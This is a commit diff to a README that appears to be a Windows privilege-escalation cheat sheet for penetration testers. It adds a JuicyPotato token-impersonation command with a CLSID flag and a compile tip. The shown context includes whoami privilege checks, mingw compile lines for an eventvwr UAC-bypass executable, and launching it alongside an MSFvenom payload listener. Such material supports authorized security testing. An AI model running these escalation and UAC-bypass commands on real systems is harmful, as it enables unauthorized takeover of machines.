Update README.md
This commit is contained in:
@@ -911,6 +911,7 @@ whoami /groups
|
|||||||
# Check Privledges for Impersonation
|
# Check Privledges for Impersonation
|
||||||
whoami /priv
|
whoami /priv
|
||||||
JuicyPotato.exe -t * -p {run.exe} -l 8003
|
JuicyPotato.exe -t * -p {run.exe} -l 8003
|
||||||
|
JuicyPotato.exe -t * -p {run.exe} -l 8003 -c {CLSID}
|
||||||
|
|
||||||
https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
|
https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
|
||||||
|
|
||||||
@@ -937,6 +938,7 @@ strcat(curPath, "\run.exe");
|
|||||||
Compile to .exe: 64 ot 32 bit
|
Compile to .exe: 64 ot 32 bit
|
||||||
x86_64-w64-mingw32-gcc evenvwrbypass.c -o eventvwr-bypassuac-64.exe
|
x86_64-w64-mingw32-gcc evenvwrbypass.c -o eventvwr-bypassuac-64.exe
|
||||||
i686-w64-mingw32-gcc evenvwrbypass.c -o eventvwr-bypassuac-32.exe
|
i686-w64-mingw32-gcc evenvwrbypass.c -o eventvwr-bypassuac-32.exe
|
||||||
|
# -static flag for library issues
|
||||||
|
|
||||||
Run Executable with listener setup in same directory as MSFvenom payload
|
Run Executable with listener setup in same directory as MSFvenom payload
|
||||||
eventvwr-bypassuac-64.exe
|
eventvwr-bypassuac-64.exe
|
||||||
|
|||||||
Reference in New Issue
Block a user